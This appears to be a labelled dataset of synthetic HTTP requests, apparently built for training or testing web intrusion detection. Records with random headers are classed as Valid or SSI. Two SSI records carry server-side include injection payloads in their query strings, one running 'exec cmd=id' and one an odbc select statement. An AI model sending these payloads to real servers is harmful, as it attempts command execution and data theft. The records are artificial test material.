User-Agent: Mozilla/9.7 (Windows; U; Win 9x 0.0; rI-66; rv:9.0.4) Gecko/52304422
UA-CPU: MIPS
UA-Disp: 8275,864,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 246x7710
Via: FTP/7.9 112.230.225.23, HTTP/3.6 18.199.49.98
Transfer-Encoding: compress
Upgrade: leeo/7.8, ciiam/4.0, wtx/5.6, u8e/9.4
Warning: 503 www.hesa5ol.html:9360 "rpo78l" "Thu, 30 Jun 05 14:07:38 UTC"
X-Forwarded-For: 152.55.56.249
X-Serial-Number: 7592797493312
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19684
Start - Id: 323
class: Valid
GET /27BrsSFZ8Byj/evDlsaaliqq/fmreiBWKS.html?3iutra9oecnnke=ss1fkquAl_k&three4aw=aQOI&nht=cKgLjFrhOk&aa=xoo&tgHdt1nl=iftyeSotn&YgVwindow.openCnullJnp@1=0a1s&acceptQR8t5gTr=1770&Pu0ieeh5jbzv=04400901 HTTP/1.0
Host: 221.199.175.125
Connection: keep-alive
Accept: image/jpeg
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=364
Client-ip: 91.136.93.17
Cookie: iex=58460828;Jhiphpof3Qcopy=ds1ciju+bchildle;dnsaes6oibez=nadeHmrsrjrnti;7nmg=3eael;s2sm=eopted
Cookie2: $Version="5"
Date: Sat, 29 Nov 08 04:10:06 GMT
ETag: W/"iwoQ954Ux3XociSacO"
Expect: ogsJbs
From: sje5sdr@miS7tsh6.gov
If-Modified-Since: Wed, 24 May 06 14:10:44 CET
If-Unmodified-Since: Sun, 30 Oct 05 10:57:42 CET
If-Match: *
If-None-Match: "atGTlOmVTH6LI4YbOzT8"
If-Range: *
Max-Forwards: 1874
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: ye6h yMsthsrA=atyake
Authorization: Digest cnonce="lrlmlld"
Range: -628836,202688-,60495-
Referer: http://iadg.be/lhoa/6bcgno4/ewrur.bin
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: ybKeuaoC
UA-CPU: PowerPC
UA-Disp: 4131,3258,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 170x4525
Via: FTP/6.7 205.76.11.78
Transfer-Encoding: gzip
Upgrade: hgrhtf/9.9
Warning: 525 237.102.27.124 "s17tooevait4Le" 
X-Forwarded-For: 167.169.89.86
X-Serial-Number: 94210
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 323
Start - Id: 6395
class: Valid
PUT /evmInlsfw.dll? HTTP/1.1
Content-Length: 18
Content-Language: cRlsy
Content-Encoding: gzip
Content-Location: /qcayno/soeWn/0fhof7sj/Dieett.css
Content-MD5: c3FkYW5pZXJlZnY5bnB1aQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 27 Feb 05 09:03:00 UTC
Last-Modified: Sat, 08 Sep 07 04:53:05 GMT
Host: 72.14.49.59:80
Connection: close
Accept: application/postscript;q=0.1, text/*, application/*;q=0.4
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale=7930
Client-ip: 139.166.161.19
Cookie: nd9qTa=1308604806;eAseepi51iett=nor%|
Cookie2: $Version="97"
Date: Fri, 30 Mar 07 16:14:21 CET
ETag: W/"oLi22bpiY0WGmAas"
Expect: 100-continue
From: dl4sbEq@atsb.fr
If-Modified-Since: Sat, 10 Oct 09 19:35:03 GMT
If-Unmodified-Since: Wed, 24 May 06 19:19:45 CET
If-Match: "QLXrj3L0TTBpLZ--Sp"
If-None-Match: "6BjACSYjDHS37@0H"
If-Range: Sat, 17 Mar 07 02:09:00 UTC
Max-Forwards: 94
MIME-Version: 1.6
Pragma: hlultfyL='tn'
Proxy-Authorization: Digest nc=A75dbFB1
Authorization: NTLM Z2Vsd2ltb1F4dXRzOWh1QWRNcmNNYTBEZGdlc0FiZ2F1b3JlaXRhcnRrbnJl
Range: -46641,596587-2635,975-1
Referer: http://www.i3ah2le.de/dmtdeyo.conf
TE: trailers,deflate,chunked
Trailer: Accept-Charset
User-Agent: iIleoea/9.0
UA-CPU: 68000
UA-Disp: 131,664,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 4815x4543
Via: HTTP/7.2 145.9.164.238, 2.1 177.137.240.63:830
Transfer-Encoding: identity
Upgrade: wnlseg/9.9
Warning: 342 www.2r2t.tiff "caeriVie69to" 
X-Forwarded-For: 4.205.122.56
X-Serial-Number: 10020198390
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

HO5jp5t9=q.SEVLJ.Q

End - Id: 6395
Start - Id: 22918
class: Valid
GET /e0zu5/93FglvX2EThA8sX./Lq.t2N/y_qvd/aS/o.ZDFZSV9/nPbiYE0s@m04r/ikU.htm?nsLens3o=98&8srei=1&_xoD=u6aestty65h&ahpte2onea=cn8tenda&r2gIl0noeqftafQ=i7OZc74&pets7lrOdnps9e=09023493&RQtmpIV1MXnzx=rs&h6orc2entioc=51753938&eo=707&os8s0dS4Wu=%26+d&rgedla=ogw8fn&LR5droptDvuiYIh=ebq&it1ghu=eeqisdsaueho%7C9c&itfau=iJHOkYZb&ebncei=72443 HTTP/1.0
Host: 240.144.201.66
Connection: keep-alive
Accept: application/postscript
Accept-Charset: *
Accept-Encoding: 
Accept-Language: i-uiotMfZ6;q=0.0, e3ire-8;q=0.6
Cache-Control: no-store
Client-ip: 238.41.42.217
Cookie: ayMsLh=0883710631
Cookie2: $Version="3"
Date: Wed, 12 Aug 09 04:01:41 CET
ETag: "@GM7rn-X4zBEjgFECt."
Expect: 100-continue
From: sheeev0h@4urQEniSH.be
If-Modified-Since: Tue, 29 Mar 05 04:59:22 UTC
If-Unmodified-Since: Thu, 13 Aug 09 17:07:22 CET
If-Match: *
If-None-Match: "hhBThutnuQQm.Wc@STEV"
If-Range: Thu, 25 Dec 08 05:06:25 UTC
Max-Forwards: 2601
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Basic c3RDZWVvbDpvbmxUYWF5
Authorization: Basic c3BhbjpOU3N6dFFs
Range: 9849-,026-7220,-544798
Referer: http://Drcv9bt.org/htemx/sdota.dll
TE: trailers
Trailer: Accept-Encoding
User-Agent: oluPEFRS http://www.e4Ahs.be
UA-CPU: x86
UA-Disp: 3881,209,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 159x1338
Via: zql8i/9.5 3.81.231.158, HTTP/5.8 www.ehEuptLr.html
Transfer-Encoding: identity
Upgrade: aHpmg/5.8, 48c/5.3
Warning: 354 www.hoyan2p.jpeg:472 "5eetxnhaaaakEiRitiae" "Sun, 18 Jul 04 13:39:03 GMT"
X-Forwarded-For: 200.140.122.194
X-Serial-Number: 467217
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22918
Start - Id: 2195
class: Valid
GET /msV5epeJoRRjvC/wA.9OnQ.wkPRe/rWOb868OA8VjO-y7TU/sTinohxeaAtrezmfqdut/pFiwmeee/x9IqGH@9LCfd9QK/calr/yoehtgT/dhfrow/erOEoxTau.jW.u.css?VfromW6kconnectGPa=oalsaeiaqaRrt09 HTTP/1.1
Host: 74.107.102.121
Connection: close
Accept: application/rtf;q=0.7, audio/basic, video/*
Accept-Charset: x-mac-japanese
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: min-fresh=104
Client-ip: 237.70.211.248
Cookie: mgts=604951;9eihspgfj=Ieokwmhel;Aixu0pt=p
Cookie2: $Version="0"
Date: Sun, 25 Sep 05 12:01:51 UTC
ETag: "7dKcolqFrPttQt23Vf"
Expect: ehcy=Tdns;Ttdtl=taCsutqn
From: EAirsero@neoLi.gov
If-Modified-Since: Mon, 29 Oct 07 13:47:03 GMT
If-Unmodified-Since: Sat, 21 May 05 21:56:46 UTC
If-Match: "DTNusEbQCBOkywe9UFjh"
If-None-Match: *
If-Range: Tue, 09 Sep 08 22:57:16 GMT
Max-Forwards: 950
MIME-Version: 3.0
Pragma: ceSea='a'
Proxy-Authorization: Basic bmVGeGU6aThsZGc=
Authorization: Basic dXNlaXRldDpvRG53YWFp
Range: 646-76073,721917-1
Referer: http://v5ofrSyO.org/ajeq/OtGa/00teb/endZit/anteT.avi
TE: trailers,chunked;q=0.8,deflate;q=0.6
Trailer: If-None-Match
User-Agent: ooehEoxigrj
UA-CPU: Sparc
UA-Disp: 8951,7788,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 318x353
Via: HTTP/4.0 104.105.202.203:8, FTP/5.1 89.248.63.213
Transfer-Encoding: identity
Upgrade: hdcfE/6.2, teysI/1.0, htgodZ/9.8
Warning: 821 104.1.134.166 "maqrtuteli" "Fri, 07 Jan 05 07:27:00 CET"
X-Forwarded-For: 2.94.110.211
X-Serial-Number: 26606464842114964
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 2195
Start - Id: 14233
class: Valid
GET /vWu0D-zYuQn2/htedImbslaisrnan4/u5styleB/d6/l6Z-nQXUaW.ogG@SmW/2krujfiwtrmnwfMocqtn/ntH6sj5nagayesmtea/atBl5r0mhnnGtUsr/rdo/sal8Zms1dduDeehtdm/sssobewewnq.html?tfptgi=811003&btweorEcRapge=suunionu HTTP/1.0
Host: www.Azdjoi.uk
Connection: e0fiibg
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ThO-rEonei
Cache-Control: no-store
Client-ip: 222.155.249.216
Cookie: EJNftpopenJ.BL=n;vgchut=etxeedgeradt5kumo;Rertcnioy=pqn9cgpwlaeLsalae
Cookie2: $Version="64"
Date: Sat, 02 Aug 08 21:46:04 GMT
ETag: W/"AeZN8RZMmoUH4hCBsnaF"
Expect: 100-continue
From: ytnpe@aitntig.fr
If-Modified-Since: Mon, 13 Mar 06 07:17:45 CET
If-Unmodified-Since: Fri, 16 May 08 16:10:57 GMT
If-Match: "5DD1SVYRO0IIvjj2"
If-None-Match: "KYNXY-6@d0mDjLlTbQ"
If-Range: *
Max-Forwards: 443
MIME-Version: 0.5
Pragma: ettmTg8=lhD
Proxy-Authorization: iAwt ytdeMtan=qbp5ee
Authorization: Basic ZG1kdHI6a3d2a2F6
Range: -901847,5-685
Referer: /c0dettk/egarlj/nosuetif.tar
TE: chunked;q=0.1,trailers,trailers
Trailer: Accept-Encoding
User-Agent: ntmA6/2.2.4
UA-CPU: MIPS
UA-Disp: 985,925,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 962x171
Via: FTP/2.5 www.na6moiut.png, FTP/9.2 99.145.117.81:599, xvyf/5.1 118.72.239.53
Transfer-Encoding: identity
Upgrade: nemhde/8.2, tex32o/1.6, 6cPmot/5.9, eiypMx/6.4
Warning: 616 154.56.254.74 "ansu3dtaabmzoDoqtefe" 
X-Forwarded-For: 177.22.102.112
X-Serial-Number: 21052565504410930240
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14233
Start - Id: 20587
class: Valid
GET /6dgfoSt/th/etmr35QqIC-b3/fzQs37/6Asarajli0o/Y7AY1W/4VGsK/fXo3l.png? HTTP/1.0
Host: www.joeaeEdaw.de
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: cp-936
Accept-Encoding: deflate, gzip, deflate;q=0.8, deflate;q=0.0
Accept-Language: saZo-i;q=0.8, voo-ia9vLvbn, ltnevs-dy26rtsl;q=0.7, l0oAaoSa-urMl1tnr, awf-n6bxfm6h;q=0.7
Cache-Control: only-if-cached
Client-ip: 152.209.101.133
Cookie: olmhto8uo8EceeX=gotantebnhm nSa[Ovsc;jeeriF= ;sSeeazeMoeiP=8t8nFdeaotUr;t5jToig=0;vmt9h= >;andm=267
Cookie2: $Version="5"
Date: Tue, 24 Jul 07 20:22:14 CET
ETag: "y2IzXYQmaW4pbbLdCKr3"
Expect: 100-continue
From: er9oa@3ehh.fr
If-Modified-Since: Tue, 04 May 04 12:22:12 GMT
If-Unmodified-Since: Thu, 27 Apr 06 14:10:52 CET
If-Match: "_QP9qHFjq1ew8Tw"
If-None-Match: *
If-Range: Sat, 23 Oct 04 07:27:41 UTC
Max-Forwards: 9
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: dnmhep ntnihsn=Rtnee
Authorization: Digest nc=2bca92A6
Range: 1-99
Referer: /39TShz/etlnebEe.php4
TE: trailers,trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/1.5 (Machintosh; U; PPC Mac OS X 1.3; yi-ei; rv:6.8.9) Gecko/08887668
UA-CPU: StrongARM
UA-Disp: 265,2929,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 1074x5578
Via: 2.1 www.uropej.shtml
Transfer-Encoding: deflate
Upgrade: 1bh2nl/0.8, aHt/2.8
Warning: 085 www.nNmehRA.gif "mrtsh7o" "Wed, 07 Feb 07 15:55:05 GMT"
X-Forwarded-For: 16.249.84.121
X-Serial-Number: 999844116491308
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20587
Start - Id: 40918
class: SSI
GET /it5/Dhh0e/jO6heweeay9mtxe/smWEM/wfrzM_TA/agNtoy.php3?f1=0&erut6sgw19disr=rn%7Cxon%3Aimnaccess_logereplacelwa+m0%5B&tiMoOfvS0eitou9=eiO&2datoxuonnct=924&sxcinU2y=opth%3Cf&Utseeha0d=aiframet3har&rrT2cod592lcgn=%3C%21--+%23odbc+connect%3D%22d4o8%2Crt9pr%2ClmTd%22++++statement%3D%22select+++++*+from+++++oa%22--%3E HTTP/1.0
Host: 241.3.63.4
Connection: fbuuwrr
Accept: image/*;q=0.9, video/*, video/*;q=0.8
Accept-Charset: cp-932;q=0.7, windows-1253, x-mac-arabic;q=0.1
Accept-Encoding: *;q=0.3
Accept-Language: 4eTEilm-iqcRd
Cache-Control: no-transform
Client-ip: 251.136.125.73
Cookie: ihleAeef=h5WjyVFoBhgA;nsrivr45s=742;osrp6=c9X_L0;hcevkfqttvmsita=e;mMirom7ijt=ipnhnMdrpxijnc
Cookie2: $Version="3"
Date: Wed, 26 Jan 05 17:40:31 UTC
ETag: "4DOTsaKeuKe20mWmkYac"
Expect: 100-continue
From: 7tnz7e@rrkue5aod.it
If-Modified-Since: Wed, 30 Sep 09 23:19:52 UTC
If-Unmodified-Since: Sun, 27 Dec 09 16:12:54 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 08 Nov 09 08:31:55 CET
Max-Forwards: 8092
MIME-Version: 9.9
Pragma: tacky=pnvIo5
Proxy-Authorization: Digest qop=auth-int
Authorization: NTLM ZXV0Q24zdm90aXVhYW9neW9OZWx0c3J1aDdyaXN4YWJzNHNuZUU=
Range: 939367-027061
Referer: /xihot6o/tmniat/avsls4ah.tar
TE: trailers,gzip
Trailer: Accept-Encoding
User-Agent: Mozilla/9.9 (Machintosh; U; PPC Mac OS X 9.9; 5A-oe; rv:3.5.8) Gecko/74663874
UA-CPU: MIPS
UA-Disp: 613,8082,8
UA-OS: Win98
UA-Color: color16
Via: HTTP/2.0 www.RmsIp.jpeg, hnEs/1.6 214.44.60.105, 9.6 62.144.17.199
Transfer-Encoding: identity
Upgrade: Oeoe/7.5, tls/2.6
Warning: 086 61.20.174.151 "hej5T2phoa6l2adseC1t" 
X-Forwarded-For: 175.203.115.62
X-Serial-Number: 163741114628927
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40918
Start - Id: 25723
class: Valid
GET /tEnhoeamheot/tisLtDedjenRty/aioxfe0qst/fynpmsteiqtIiIrdaiel/aW/m@ISy_t/72ne/ouix4minaaleessetbl/nvHimloYLs6lLvw.A6/i7e0e/oiySrw2/dir3ecEmdeaa6N.js?g3m6gestqsfeqmt=680&9elya=76028&ydkqrtei=+szeemn&5Q7openj1fZform=8387937835&yeiurfc2s=iaj1msnii HTTP/1.0
Host: www.nOsnosaa.uk:80
Connection: c6olE
Accept: */*
Accept-Charset: x-mac-chinesesimp;q=0.2, shift_jis;q=0.2, x-mac-hebrew;q=0.0, macintosh
Accept-Encoding: *
Accept-Language: oor3C-oenwkEUb, tlw-noa
Cache-Control: max-stale
Client-ip: 39.160.15.83
Cookie: ralNto5Rc9irn9m=6647
Cookie2: $Version="766"
Date: Wed, 28 Jan 04 01:47:43 GMT
ETag: "vb2cyK3WTg@r7rc1X"
Expect: bdhnA
From: xschuvm@deiWYe.gov
If-Modified-Since: Wed, 22 Mar 06 23:49:55 GMT
If-Unmodified-Since: Wed, 02 Jul 08 09:18:28 GMT
If-Match: "8MV6-AWtk1iz@aGCCQ"
If-None-Match: *
If-Range: "hhZL@wS6zSOIBr21A.7l"
Max-Forwards: 324
MIME-Version: 1.3
Pragma: tr6o=wsdh
Proxy-Authorization: Digest algorithm=MD5
Authorization: Digest uri=http://ekoqa8oa.uk/Tarrsr.ace
Range: -1,27054-,1-75962
Referer: /as3eEl/1onf/hmen/n3aE.sh
TE: trailers,gzip;q=0.4
Trailer: TE
User-Agent: aTDHhPug http://www.isrHt.it
UA-CPU: MIPS
UA-Disp: 7894,3200,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 5684x8166
Via: HTTP/0.0 196.73.212.200, 3.9 www.aanEah.html:8
Transfer-Encoding: deflate
Upgrade: ojeiet/9.9, woq/6.0, ttYs/5.7, urTi2/9.1
Warning: 312 www.ehadjrru.jpg "lr4omuoE" 
X-Forwarded-For: 4.231.239.216
X-Serial-Number: 3806005449065232991
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25723
Start - Id: 28538
class: Valid
GET /zdex1TLuat2/4VSfsAHmGs/iUQ20l@@ri/ysnhtqyht/ihtnssrIDAa0hne3/iegohp2hohlNwiwtoe/yRrufesoayi/e.ogwj/ea7F4/FPu.swf?eqshr3rida1erd=%7E%29&edaerowi7hcI=ncT5wtGQTcX9&trvewtsieeiatso=65241393&nm4sai=tyiiop+d%3Ci&5EPshttpsHV=197&aYhmeeflt=920773809 HTTP/1.0
Host: 133.235.39.28
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: identity, identity;q=0.8, compress, identity;q=0.4, deflate;q=0.9
Accept-Language: *
Cache-Control: min-fresh=411
Client-ip: 8.219.184.213
Cookie: t6y=pq cds;5nn8unita5naw=adit
Cookie2: $Version="420"
Date: Sat, 24 Apr 04 07:28:39 CET
ETag: W/"d8l7kAzDFiLNc-Wyw3GV"
Expect: 100-continue
From: tuezrt@nexhlht5a.it
If-Modified-Since: Wed, 05 Apr 06 17:38:04 CET
If-Unmodified-Since: Wed, 24 Jun 09 21:49:09 GMT
If-Match: "mR8h8@0nytA5Zmrc5"
If-None-Match: "6BSRBGQdCE9kRZ3"
If-Range: *
Max-Forwards: 1982
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: 1h6aL 2soNn=rl1nsusL
Authorization: naheet ytMaam=7cntz
Range: 6-267184,-1,5-7119
Referer: http://nbte.com/rgehphw/aivin/cNtl/8loYi/hstCrn.tiff
TE: trailers,deflate
Trailer: Accept-Charset
User-Agent: Mozilla/3.6 (Windows; U; Win 9x 9.3; ar-sl; rv:4.8.2) Gecko/57128282
UA-CPU: PowerPC
UA-Disp: 3600,6698,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 6545x8948
Via: 2.4 www.aRTte6.jpg, 8.6 236.139.238.69
Transfer-Encoding: deflate
Upgrade: 8omcl/7.6
Warning: 013 38.161.125.54 "rsGoemitnia" 
X-Forwarded-For: 199.127.83.69
X-Serial-Number: 672108482852
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28538
Start - Id: 4478
class: Valid
POST /SfBbJPs2Ssee/etS1oronllga2Yci2Ibe/wPU_NlrP-bbZiV0EZV/tludprbnoh/Iiwd6nrnertoLe/m5NCezo.O8A3_hIl/7t3seguifo/_30%uAprocessing-instructionFPB5K4connectB/xbyAP0unionAIM_H.gif? HTTP/1.1
Content-Length: 107
Content-Language: auq,a2,l
Content-Encoding: compress
Content-Location: http://www.irdoctae.ch/aseTPevm.jpeg
Content-MD5: cm90SWNrZnRuaXRnaXB1dw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 23 Sep 07 21:50:15 CET
Last-Modified: Mon, 07 Dec 09 18:19:57 GMT
Host: 48.202.108.169
Connection: close
Accept: video/*, image/*
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 157.6.94.128
Cookie: qxi=telnetlSn@ghttp0nRn0s@ejsan;o59Seutct=6080723;jU6Yhttpk34xK=nphXkn96d;MNXVmonr-@_=i2VPd9Gi
Cookie2: $Version="357"
Date: Sun, 09 Mar 08 24:19:49 GMT
ETag: "T1Np.U00Gp9bgT5HkM7R"
Expect: 100-continue
From: eneiwbe@rqreia1soo.ch
If-Modified-Since: Tue, 17 Nov 09 11:48:41 UTC
If-Unmodified-Since: Wed, 14 Dec 05 05:14:52 GMT
If-Match: "B6b@nBTTQxuyN-Ddiy"
If-None-Match: "S49JGuCdfzzjMBpzh7w"
If-Range: *
Max-Forwards: 1
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: Basic aW5qdnVwdXI6bzFTcHB6TQ==
Authorization: NTLM azVUaTc5dmY4c2xnblJlb3BubjVFeHJ0c2lyZG9hSDdvdHdvc3Jl
Range: 47-43864,-075,-7838
Referer: /efcxtc/cspaEm/ake3aeoo/daeticsz.css
TE: chunked;q=0.6,deflate;q=0.8
Trailer: Accept
User-Agent: attr2tqt (ux-UHpFA; yW29sCipeY; nMcQZWfvBg; x6h89VMtnU)
UA-CPU: StrongARM
UA-Disp: 9080,142,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 421x3151
Via: 5.7 www.oist.png:360
Transfer-Encoding: gzip
Upgrade: Ncnd/9.0, sne/9.0, e0cb/3.5, la4/2.0, sjR/3.7
Warning: 697 9.224.232.71 "leaB" 
X-Forwarded-For: 108.74.212.152
X-Serial-Number: 944553276
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

faw2iO9b=rsrsgehhutssfeN&nseremp=100&ytTns=mi aaIi&eidabOisbRVcriS=81erpISahy6&ro=nboot.inia Tmi$&se=txhw

End - Id: 4478
Start - Id: 19657
class: Valid
GET /swinJLJR/iTbpuT7.J/0kKDSWsGssLuo/zHfTtdBzE13M3/x.lryA5JQk@JYUX2y/Iv@cpboot.iniu9BSautoexecWg/eDr9ePeondoaeaa5/vshutdownbYtGe-sf/OGZvar@VBhT/x.a-fKGDjdmS4HUIzHk/edOlQ2UqXZnqTDFnS/e@nHhjs.htm?srrnnnrane=iBArC&ac5AtytoEru=5806&inlet=droplaiopositionteis%5Cszi8&zyhea3alnl=serviceshdj&lTTa6=eEt0euslntaU&fads5tr=nbisoveyo+h30%26%5B&hddntihn=6579&in=hzbaG HTTP/1.1
Host: 37.82.26.152:81276
Connection: oOmFs
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: tciVaTe='aKoi2s'
Client-ip: 44.135.132.81
Cookie: tj=680;dtAfriyutpo=d0=pg
Cookie2: $Version="5"
Date: Thu, 26 Apr 07 17:35:04 GMT
ETag: W/"-qsLuv-EiEwuhFBn4MD"
Expect: nsr1=r1ent9e
From: sbhe@iho1e.be
If-Modified-Since: Sun, 30 Apr 06 04:52:20 UTC
If-Unmodified-Since: Tue, 28 Oct 08 13:20:08 CET
If-Match: "9gBXlsj_@s@HDOma0"
If-None-Match: "By9Zhi9bJbd69ZAzgwA"
If-Range: Wed, 18 Jan 06 02:28:12 GMT
Max-Forwards: 3166
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: NTLM YVRzb3BlZ2lBc2hhb3Rwb3JwZ2hpZTNzQW5wQWg0b25kV3NpdmlleWRl
Authorization: Digest cnonce="sdde"
Range: -382
Referer: http://www.wnrhtn64.de/sisyo/AitmHbnc/tawerncy/2k6dp.bin
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/6.0 (X11; U; Unix 2.3; e9-Je; rv:7.5.1) Gecko/22330794
UA-CPU: StrongARM
UA-Disp: 4810,493,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 106x833
Via: 6.0 www.afxecn.html, 5.7 54.120.47.170:95, FTP/9.2 151.102.188.215
Transfer-Encoding: gzip
Upgrade: eShaio/0.4
Warning: 485 208.128.255.74:96 "ouromuettw" 
X-Forwarded-For: 44.241.139.6
X-Serial-Number: 3717830
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 19657
Start - Id: 40068
class: SSI
GET /copym2oR_Py@/qxX9hxB9b1JQVru2y/ewouzdi2heYda1cnsa8m/ihnzipBRtE2zoc/u4baNmzXrb-ZGya-d/tHw1/L1jtw/ZyDLHRj3D.IkS/hJx/dgEb3eotjeiiraiwhta7/chy.htm?tQea=aevalopend&otftzx8yesouk4r=W0uecevioh&L5y1etdatiht=494144&aao=rDm9RQ&eH=bo1rurHrsRtmb&6hiiesc2iritnc=688&7O@51OL=i%3AtLiSKk&aqazat7i=%3C%21++++%23%3C%21--++%23exec++cmd%3D%22id%22--%3E&odelete@7q5inputX=e9Y2&53eer=96530 HTTP/1.1
Host: 201.108.179.34
Connection: 8ccy0
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.4
Accept-Language: aeo-7lrqoade, h-2;q=0.4, erjdae-9e5wh;q=0.7
Cache-Control: max-age=5
Client-ip: 159.72.147.40
Cookie: 0woooaatga=ntNemtAkti)re]htaccesulin;naqeOmh1ghs=ik?hlocationc:insertnctnEtaad$$
Cookie2: $Version="530"
Date: Mon, 21 Dec 09 21:26:51 CET
ETag: W/"m822BdROxDnURNjxK_V."
Expect: 100-continue
From: uohepreO@9Mntu.biz
If-Modified-Since: Sun, 03 Oct 04 01:05:25 CET
If-Unmodified-Since: Sun, 24 Jun 07 04:07:34 UTC
If-Match: *
If-None-Match: "lbTqAHvuE1Uv8WX7LgLZ"
If-Range: Sun, 12 Sep 04 16:59:36 UTC
Max-Forwards: 775
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: 4allo mtnma=nrn0a
Authorization: Digest uri=http://www.atrBt.uk/llTg/lmty/srosiRhd/mteu/4rRzRrnd.swf
Range: -34,965-6
Referer: /ee4D2.swf
TE: chunked,trailers
Trailer: Via
User-Agent: Mozilla/4.0 (Windows; U; Win98 2.3; bc-n0; rv:5.9.4) Gecko/51839783
UA-CPU: PowerPC
UA-Disp: 665,2462,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 893x680
Via: 3.8 40.37.223.23, fenf/3.4 www.v9eom.htm, 0.6 67.70.172.248
Transfer-Encoding: deflate
Upgrade: ToKh/4.1, goe/9.9, moax/0.8
Warning: 911 www.ejut.htm:36 "cae6hwoklthpbe8t9y" "Wed, 10 Feb 10 10:50:49 GMT"
X-Forwarded-For: 149.177.156.143
X-Serial-Number: 827844806951903095
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40068
Start - Id: 48
class: Valid
GET /wcz42FH/o9Y@inzyxKvKg/g9@oN2FhUEuJZDl9ZMo7/l1LlstVxZhd_b/Zjcmcmds.XBSunion.htm?n1woithgn=3UsFmTbrX-&AxBe=1Nx0Nft&igs=sxp_osebds&7hye=-&1SMYl-Cbody=s&ge=3p4lexec%3Fneboot.inise%27&eesd=214416270&Exssr=30&at7nxr3niyoh0n=07807&MN9hL=4_q HTTP/1.0
Host: 35.46.82.193:80
Connection: close
Accept: */*;q=0.8
Accept-Charset: hz-gb-2312;q=0.6, x-mac-greek
Accept-Encoding: *;q=0.5
Accept-Language: n2t-Nosd;q=0.6
Cache-Control: min-fresh=20794
Client-ip: 138.17.45.182
Cookie: gyOrrhet=uac3estpleeosu;ahaiaUAntAo8tel=tk5ntp;ws8ewm=69;4processing-instructionNnZ0g@uunionmT=k Ttd
Cookie2: $Version="888"
Date: Sun, 26 Feb 06 05:40:26 GMT
ETag: W/"4sU0haqH64aQyDhN0q"
Expect: 100-continue
From: xi3o@ntrnibn3.cz
If-Modified-Since: Thu, 25 Dec 08 10:56:20 CET
If-Unmodified-Since: Wed, 20 Apr 05 20:20:18 CET
If-Match: "pkflcBjerBvQWWvScJ"
If-None-Match: *
If-Range: Thu, 17 Feb 05 03:08:13 UTC
Max-Forwards: 4
MIME-Version: 5.9
Pragma: cba1ri='cro4S'
Proxy-Authorization: Digest cnonce="qbAila"
Authorization: NTLM aW5iMG9JdXprZXN0dGFoOXljZ3B5b2Fwc29hMG1LaDY2a0hyZGE4aGpyQW9s
Range: -54670
Referer: /ud98f.cgi
TE: trailers,chunked;q=0.7,trailers
Trailer: Date
User-Agent: mtfommu
UA-CPU: PowerPC
UA-Disp: 4994,968,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 2292x8708
Via: 0.2 138.69.174.126, 4.9 114.161.70.166, 4.5 59.118.185.183
Transfer-Encoding: gzip
Upgrade: hLRhxe/5.2, s0es/4.2, soa/3.2, jO6i1/4.4, i6h/1.6
Warning: 232 www.AlaosaP.html "peaiso" "Tue, 27 Oct 09 21:12:39 CET"
X-Forwarded-For: 236.194.223.102
X-Serial-Number: 11088084368938751
----: ---------------
